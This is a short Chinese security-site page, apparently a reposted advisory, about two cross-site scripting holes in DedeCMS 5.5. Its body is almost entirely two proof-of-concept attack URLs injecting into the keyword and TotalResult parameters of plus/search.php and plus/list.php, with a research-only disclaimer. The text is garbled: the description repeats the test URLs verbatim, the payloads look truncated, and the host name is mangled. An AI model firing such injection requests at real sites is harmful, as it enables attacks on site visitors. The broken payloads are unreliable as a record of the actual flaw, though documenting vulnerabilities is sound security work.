dedecms织梦 v5.5 两处跨站漏洞

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  影响版本:

  dedecms织梦5.5

  漏洞描述:

  demo1:http://.dedecms./plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://.dedecms./plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2

  测试方法:

  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  demo1:http://.dedecms./plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://.dedecms./plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2

  

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by